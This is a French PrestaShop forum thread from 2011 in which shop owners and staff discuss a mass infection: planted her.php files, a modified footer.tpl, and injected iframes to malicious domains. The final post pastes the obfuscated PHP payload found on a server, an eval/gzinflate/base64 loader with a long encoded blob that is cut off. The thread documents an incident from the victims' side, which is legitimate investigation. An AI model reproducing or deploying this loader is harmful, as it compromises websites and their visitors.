Patrick21 Posted August 24, 2011 Share Posted August 24, 2011 Bonjour un fichier her.php s'installe dans le dossier /modules je l'ai effacé hier il portait comme date 23/08/2011 - 15h28 ce matin il est recréé meme date meme heure cette boutique n'est pas activée (essais) - la meme boutique sur un autre serveur (mutualisé) n'est pas affecté pour le moment j'ai renommé le dossier d'installation et passé le dossier /modules en chmod 755 pour voir un sujet en anglais en parle http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/ mais je parle mieux le francais il parle de modif du fichier footer.tpl (le mien n'a pas été affecté) il est urgent que Prestashop réagisse Patrick version 1.4.3.0 Link to comment Share on other sites More sharing options...
Patric Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, Notre équipe est en train de se pencher sur le problème. Nous vous tiendrons au courant dès que possible. Merci pour ce retour. Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 Bonjour mon site internet a également été infecté ! Je l'ai mis en maintenance car je ne sais pas comment faire pour remédier au problème. Je l'ai remarqué hier vers 15h30-16h00 alors que je mettais des produits en vente. Link to comment Share on other sites More sharing options...
Patrick21 Posted August 24, 2011 Author Share Posted August 24, 2011 Bonjour mon site internet a également été infecté ! Je l'ai mis en maintenance car je ne sais pas comment faire pour remédier au problème. Je l'ai remarqué hier vers 15h30-16h00 alors que je mettais des produits en vente. La mise en maintenance ne resoud pas le probleme, mon site qui a été infecté était en maintenance il faut deja effacer le fichier her.php et attendre les informations de prestashop Patrick Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 J'imagine mais je ne savais pas si le laisser en ligne affecterait les PC des visiteurs. Dans quel dossier as-tu trouver le fichier her.php ? Link to comment Share on other sites More sharing options...
Anacronis Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, Je suis dans la même galère que vous sauf que je n'ai pas ce fameux fichier "her.php" ! Actuellement en version 1.4.4.0 et en phase de finalisation sur un serveur de tests avant de mise en production. Ce matin en allant sur le site pour terminer les dernières modifs de mon client je me suis rendu compte de bugs bizarres que je n'avais pas la veille : 1) La liste des catégories produit est vide (bloc d'affichage vide) 2) Sur la fiche produit impossible d'afficher l'image d'un produit dans la "thickbox" 3) Impossible de mettre un produit dans le panier ! En utilisant le debug de "chrome" je me suis rendu compte que : 1) le fichier "script.js" dans le répertoire "<racine>/js" a été supprimé !!! 2) le fichier "jquery-1.4.4.min.js" comporte des erreurs alors qu'avant tout était impeccable !!! 3) en regardant le "footer" de ma page j'ai remarqué un tout petit carré noir et en utilisant le debug de chrome j'ai trouvé des iframes en cascades injectés dans ma page avec des liens trés suspects : clickmemk.fileleave.com, jokelimo.com, erabaglanti.ka.hn Quelqu'un à t'il une solution car tout mon site est en vrac ? Comment celà est possible d'injecter du code dans le footer.tpl ? Comment faire pour que celà ne se reproduise pas ? Cordialement. Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 Toute l'équipe travaille sur ce problème et fait tout pour le résoudre le plus rapidement possible. Dès que nous aurons plus d'informations nous ne manquerons pas de les communiquer. Soyez assurés que c'est notre priorité numéro 1 de résoudre ce problème. Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 Hier je voyais juste une iframe à droite du site qui me décalait tout mon design. Aujourd'hui si je l'ai mis en maintenance c'est parce que mon antivirus ainsi que celui de mon amie indique un Cheval de Troie. D'où mon inquiétude. Je ne m'y connais pas trop en html et compagnie, ce n'est pas moi qui m'occupe de tout ça donc j'avoue être un peu perdu concernant la source de ce virus. J'espère que vous trouverez la solution. Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, Plusieurs fois des informations de piratage, virus ou autre sont annoncés sur Prestashop et dans 99,99% c'st l'ordinateur de la personne qui travail sur le site qui est en cause par son FTP ou par une porte ouverte. Alors protégez vos PC avant tout (prenez un Mac, ) EDIT : -4 sur ce post c’est vraiment du foutage de gueule cette notation c'est dommage que l'on ne puisse pas savoir qui vote histoire de faire des petites guerres inutiles. Surtout que là c'est même pas l'ordinateur d'un utilisateur mais tout le système qui est en cause et c'est bien une erreur humaine puisque c'est une erreur de développement. (allez-y, vous pouvez mettre de nouvelles notes négatives pour cela aussi). 1 Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 Jeckyl c'est quand même bizarre que ça arrive à plusieurs personnes en même temps non ? Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Ben non, car on appel cela une attaque tout simplement et c'est fait simultanément sur tous les ordinateurs infectés. Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 Ok c'est embêtant .... bah si j'arrive à virer ce virus, je ferais en sorte de mieux protéger mon PC et mon site internet. Pour l'instant je suis bloquée! Link to comment Share on other sites More sharing options...
Patrick21 Posted August 24, 2011 Author Share Posted August 24, 2011 Bonjour, Plusieurs fois des informations de piratage, virus ou autre sont annoncés sur Prestashop et dans 99,99% c'st l'ordinateur de la personne qui travail sur le site qui est en cause par son FTP ou par une porte ouverte. Alors protégez vos PC avant tout (prenez un Mac, ) Je ne pense pas que l'on soit dans ce cas la car : hier soir j'ai effacé par ftp le fichier her.php et ce matin en vérifiant toujours par ftp il était revenu alors que je n'ai rien transféré ou modifié sur le site Patrick Link to comment Share on other sites More sharing options...
Gaet Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, Plusieurs fois des informations de piratage, virus ou autre sont annoncés sur Prestashop et dans 99,99% c'st l'ordinateur de la personne qui travail sur le site qui est en cause par son FTP ou par une porte ouverte. Alors protégez vos PC avant tout (prenez un Mac, ) Je ne pense pas que l'on soit dans ce cas la car : hier soir j'ai effacé par ftp le fichier her.php et ce matin en vérifiant toujours par ftp il était revenu alors que je n'ai rien transféré ou modifié sur le site Patrick Bonjour, Même soucis ce matin : apparition de 2 fichiers php dans les répertoire upload et download modification de footer.tpl suppression du dossier smarty_v2 Par contre, pas de trace d'un fichier her.php Ces modifications sont datées du 23/08/2011 à 15:21 Par ailleurs, les logs FTP n'indiquent aucune activité qui aurait permis ces modifs. Le firewall du serveur bloque les accès FTP par adresses IP, n'authorisant que la mienne. En conclusion, pour le moment, je ne crois pas à une faille par virus installés sur nos machine de travail Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Et vous utilisez tous le même client ftp, la même version de prestashop, le même hébergeur, ... ? Donnez le maximum d'information histoire de trouver le point commun à toutes ces attaques, c'est une enquête policière à ce niveau alors jouez au Expert pour avancer car juste dire je me suis fait attaquer ne fera pas avancer le schmilblik. Link to comment Share on other sites More sharing options...
Yoya Posted August 24, 2011 Share Posted August 24, 2011 Ben non, car on appel cela une attaque tout simplement et c'est fait simultanément sur tous les ordinateurs infectés. Salut Jeckyl, pour une fois ce n'esst pas le probleme : meme les plateforme Linux sont touchés. Link to comment Share on other sites More sharing options...
Yoya Posted August 24, 2011 Share Posted August 24, 2011 http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/ Jeckyl, regarde ce topic la. Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Ben non, car on appel cela une attaque tout simplement et c'est fait simultanément sur tous les ordinateurs infectés. Salut Jeckyl, pour une fois ce n'esst pas le probleme : meme les plateforme Linux sont touchés. Encore faudrait il que les mecs donne leur config pour faire avancer l'enquête. Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 Jeckyl, si mon avis peut faire changer le tien, car ça concerne aussi ton entreprise et ce que ça peut engendrer. Il s'agit d'une réel vulnérabilité que j'essai de comprendre de mon côté. Il semblerai qu'une injection de code depuis le footer.tpl générer le fichier php dans les dossiers chmod 777 upload/download. Un fichier d'appel her.php semblerai s'installé aussi. Personne n'est à l'abri d'injection de code. Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 C'est pour cela que je propose depuis lundi l'installation du script CrawlProtect qui doit pourvoir éviter ce genre de chose, encore faut il que les modules Prestashop soient bien écrit pour ne pas se retrouver bloqué par ce script en faisant de belles bêtises comme appeler des url comme le module TNT : /modules/tnt/proxy/proxy.php?url=http://www.tnt.fr/public/b2c/relaisColis/recherche.do?code=75001 Je ne dit pas qu'il n'y a pas de hack, je dit juste qu'il faut donner du grain à moudre pour réussir à trouver la cause et pas seulement en venant pleurer. Link to comment Share on other sites More sharing options...
Patrick21 Posted August 24, 2011 Author Share Posted August 24, 2011 Alors je commence Serveur : personnel Synology avec un nom de domaine pointant sur le dossier Site : en maintenance pour essais FTP : CuteFtp ou connection réseau au dossier fichier : /modules/her.php 23/08/2011-15h28 /upload rien à part index.php /download rien à part index.php fichier effacé hier soir - revenu ce matin sans aucune manip de ma part à part connection en ftp sur le dossier ce matin renommage du dossier shopapi en shopapi2 et chmod 755 sur le dossier /modules en attente d'information Patrick Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 Ce qui nous aiderait grandement, je reprends le message de Raphaël, serait de : Pour ceux qui peuvent reproduirent le bug en local, de refaire une installation, et avant de faire quoi que ce soit d'ajouter dans admin/tabs/adminModules.php sous function __construct() { le code suivant if ($_POST) { $fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a'); fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n"); fclose($fd); } Dès que vous repérez l'infection, merci de nous envoyer un MP avec le fichier log her_log.txt présent à la racine de PrestaShop. Merci. Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 J'arrive pas à comprendre l'intérêt qu'il a à faire sauter le /tools/smarty_v2 J'ai parcouru tous mes logs, je ne vois pas à quel moment le fichier /modules/her.php a pu se créer. Seule piste serai l'upload depuis l'AdminModules, mais comment peut-il connaitre le répertoire admin au préalable. Un scan, un tracker ? 1 Link to comment Share on other sites More sharing options...
Takada Posted August 24, 2011 Share Posted August 24, 2011 Seule piste serai l'upload depuis l'AdminModules, mais comment peut-il connaitre le répertoire admin au préalable. Un scan, un tracker ? Je sais pas vraiment, mais il y a comme une impression que le virus arrive d'abord en local (dans mon cas). mon dossier adminXX étant le même que le dev... Ca vient peut-être de là. Link to comment Share on other sites More sharing options...
popol Posted August 24, 2011 Share Posted August 24, 2011 c'est du joli... Un pote chez qui c'est arrivé de matin, j'ai gardé le fichier qui avait été placé dans son download ce matin. Visiblement, c'est lui qui lance tout le bordel. Link to comment Share on other sites More sharing options...
popol Posted August 24, 2011 Share Posted August 24, 2011 Même soucis ce matin : apparition de 2 fichiers php dans les répertoire upload et download modification de footer.tpl suppression du dossier smarty_v2 Quels Chmod pour download et upload ? Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 Piste en plus ... Que je n'avais pas pensé, mais ça ne peut pas venir de l'admin puisque je suis protégé par un htpasswd. Donc impossible d'y accéder depuis quoique se soit. Le genèse du problème vient d'ailleurs. Est-ce que le frameworks tinyMce est accessible sans passer par l'admin/editeur pure. N'y-a-t'il pas une faille sur la sécurité d'upload depuis les scripts tinyMce ? Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 Bonjour tout le monde, Une bonne nouvelle, le problème est résolu et ne se propagera plus. Si votre boutique a été touchée, merci de nous contacter sur [email protected] L'équipe travaille actuellement sur un petit fix pour effacer les fichiers infectés. Nous vous donnerons plus de détails rapidement. De la part de la PrestaTeam merci de votre coopération et de votre patience. Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 Comment ça ne se propage plus ? Comment vous pouvez affirmer que vous contrôlez la propagation du script depuis les boutiques externes à vos services ? Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 On a trouvé le hacker, et on lui a mis deux balles dans la nuque, radicale mais efficace 2 Link to comment Share on other sites More sharing options...
aure58 Posted August 24, 2011 Share Posted August 24, 2011 On a trouvé le hacker, et on lui a mis deux balles dans la nuque, radicale mais efficace. C'est ce qu'il faut bien jouer :D 1 Link to comment Share on other sites More sharing options...
Yoya Posted August 24, 2011 Share Posted August 24, 2011 On a trouvé le hacker, et on lui a mis deux balles dans la nuque, radicale mais efficace hahahahahaha :D 1 Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 On a trouvé le hacker, et on lui a mis deux balles dans la nuque, radicale mais efficace Raphaël, le problème n'est pas le script en lui même, mais la méthode dont celui-ci est parvenu en dure depuis hier sur les boutiques PrestaShop des monsieurs tout le monde. Il serai bon d'expliquer techniquement comment cette propagation s'est mise en place ? Link to comment Share on other sites More sharing options...
Djolhan Posted August 24, 2011 Share Posted August 24, 2011 Si je comprends bien, prestashop est à l'origine de l'envoi en masse de ce fichier ? Ca sous entends donc que votre système permet l’envoi de fichiers vers les boutiques installées avec ce cms sans action de notre part ? Ce qui voudrait dire que vous êtes capable sans notre consentement de modifier notre boutique ? On savais déjà que le système était bourré de trackers (je me demande ce qu'en penserait la CNIL d'ailleurs...) mais la, c'est le top du top... Une explication claire serait la bienvenue avant que l'on propage (ou pas) cette info douteuse. 3 Link to comment Share on other sites More sharing options...
Yoya Posted August 24, 2011 Share Posted August 24, 2011 Si je comprends bien, prestashop est à l'origine de l'envoi en masse de ce fichier ? Ca sous entends donc que votre système permet l’envoi de fichiers vers les boutiques installées avec ce cms sans action de notre part ? Ce qui voudrait dire que vous êtes capable sans notre consentement de modifier notre boutique ? On savais déjà que le système était bourré de trackers (je me demande ce qu'en penserait la CNIL d'ailleurs...) mais la, c'est le top du top... Une explication claire serait la bienvenue avant que l'on propage (ou pas) cette info douteuse. Je rejoint Djolhan : si ça touche des clients en localhost, autant qu'en ligne, autant sur les différents OS, meme sur une toute derniere version de SVN, et que le probleme est résolu sans patcher le code : ça vient forcement de de prestashop.com. 1 Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 Je vous suis moi aussi. C'est exactement ce que j'en déduis. Sans explication technique auprès de la communauté, ça risque de faire du remue ménage dans pas longtemps auprès de la communauté. 2 Link to comment Share on other sites More sharing options...
Oron Posted August 24, 2011 Share Posted August 24, 2011 Bonjour Je mets mon grain de sel en plus suite à un autre post : Avast à bloquer l'url de clickmemk fileave com (j'ai pas mis les points pour ne pas faire de lien) Vous avez un module avec cette url dedans. Soit c'est un module soit c'est le thème, si vous avez mis des modules et thème que vous les avez en local sur votre poste, faite une analyse du fichier !! JS.Redirector_IV [Trj] = un virus qui s'attaque au site web, il redirige les pages d'un site web vers un autre, parfois il se sert du serveur pour envoyer des spams. Télécharger Malwarebytes anti-malware et analysez vos fichiers. Conseil : Pare-feux + Antivirus + Antimalware, Antivirus et Malware mise à jour régulière, malwarebytes recherche des mises a jour tous les jours. Les mots de passe de vos sites : Utilisez des lettres et chiffres, majuscule et minuscule + symbôle @ - = * + < § £ % Faites des mot de passe de au moins 8 caractères et sans utiliser des mots connus ou pouvant vous identifier. Pour les dossiers d'administration évitez d'utiliser le mot admin , administration, adm, même avec des chiffre ou lettre en plus.. Prenez votre dictionnaire ou utilisez à mots étrangers à votre langue ou créer des mots au hasard, bien sur sans oublier de les noter chez vous. si vous travaillez dans un bureau ne laisser pas les mots de passes à votre bureau. Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 Après discussion avec les développeurs, il s'avère qu'une personne avec des intentions peu louables a essayé de détourner notre flux RSS afin de propager ses fichiers malicieux. L'équipe technique va rapidement proposer un patch permettant de corriger cela. Nous faisons le nécessaire afin que cela ne se reproduise plus à l'avenir. Je reviendrai vers vous avec de nouveaux éléments et une information plus complète dès que c'est réglé. Link to comment Share on other sites More sharing options...
Johann Posted August 24, 2011 Share Posted August 24, 2011 Après discussion avec moi-même, il s'avère que cette personne a un peu plus qu'essayé :-) ! Bon, l'essentiel est que ça soit identifié et réglé ! Mais c'est vrai qu'on aimerait bien savoir plus précisément comment et pourquoi cette saloperie nous a touché. 3 Link to comment Share on other sites More sharing options...
Patrick21 Posted August 24, 2011 Author Share Posted August 24, 2011 La seule chose que j'ai fait hier vers 15h c'est télécharger la version 1.4.4.0 et je l'ai dézipper est ce que le ver se trouvait dedans ? malwarbytes ne le trouve pas ! ou c'est par l'administration du site, vu que l'on recoit des info de prestashop, peut on supprimé cette connection avec prestashop ? Patrick 1.4.3.0 Link to comment Share on other sites More sharing options...
Yoya Posted August 24, 2011 Share Posted August 24, 2011 Mais ça veut dire que depuis vote flux RSS, vous pouvez rentrer sur nos boutiques ? Je comprends pas la ... Pierre. Link to comment Share on other sites More sharing options...
Djolhan Posted August 24, 2011 Share Posted August 24, 2011 Faites un test, essayez d'installer une boutique prestashop sans connexion internet, vous ne pourrez pas. De nombreuses données perso ou pas, transitent à l'installation, donc, facile d'imaginer qu'après, c'est la même chose... Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 Après discussion avec moi-même, il s'avère que cette personne a un peu plus qu'essayé :-) ! Bon, l'essentiel est que ça soit identifié et réglé ! Mais c'est vrai qu'on aimerait bien savoir plus précisément comment et pourquoi cette saloperie nous a touché. C'est exactement ce que j'ai fait à la même heure bizarrement ! Link to comment Share on other sites More sharing options...
Patrick21 Posted August 24, 2011 Author Share Posted August 24, 2011 Après discussion avec moi-même, il s'avère que cette personne a un peu plus qu'essayé :-) ! Bon, l'essentiel est que ça soit identifié et réglé ! Mais c'est vrai qu'on aimerait bien savoir plus précisément comment et pourquoi cette saloperie nous a touché. C'est exactement ce que j'ai fait à la même heure bizarrement ! ??? ne te serais tu pas trompé de topic en citation ? Patrick Link to comment Share on other sites More sharing options...
ElRapazGrande Posted August 24, 2011 Share Posted August 24, 2011 Mais ça veut dire que depuis vote flux RSS, vous pouvez rentrer sur nos boutiques ? Je comprends pas la ... Pierre. Je pense plutôt que c'est dû au fait que leur flux RSS est affiché sur l'accueil Back-office de tous les sites Prestashop. Rapaz Link to comment Share on other sites More sharing options...
Broceliande Posted August 24, 2011 Share Posted August 24, 2011 C'est pour cela que je propose depuis lundi l'installation du script CrawlProtect qui doit pourvoir éviter ce genre de chose, encore faut il que les modules Prestashop soient bien écrit pour ne pas se retrouver bloqué par ce script en faisant de belles bêtises comme appeler des url comme le module TNT : /modules/tnt/proxy/proxy.php?url=http://www.tnt.fr/public/b2c/relaisColis/recherche.do?code=75001 Je ne dit pas qu'il n'y a pas de hack, je dit juste qu'il faut donner du grain à moudre pour réussir à trouver la cause et pas seulement en venant pleurer. Merci de préciser de quel module tu parles jeckyl car ça n'est pas le cas du mien (gratuit d'ailleurs) et j'aimerais éviter les amalgames inutiles . En revanche j'aimerais savoir, puisque tu en parles , ton module aurait il bloqué cette vulnérabilité ci ? Ca peut faire du poids dans la balance et même me décider moi même. Edit , j'ai une autre question . Quid de ton module si l'appel à proxy.php existe mais qu'il est impossible de leurrer le proxy ? vais être détecté comme une faille alors que ce n'est pas le cas ? Je donne un exemple : /modules/tnt/proxy/proxy.php?url=recherche.do?code=75001 Dans ce cas précis, impossible d'utiliser mon module comme proxy car l'url est en dur dans proxy.php , seul l'envoi des données est fait et post filtré. Donc à nouveau , même question : sera-t-il bloqué par ton module ? Link to comment Share on other sites More sharing options...
Gaet Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, dans les fichiers php retrouvés dans les dossiers upload et download on trouve à la ligne 10 une commande preg_replace dont je ne comprends pas la sortie : <? preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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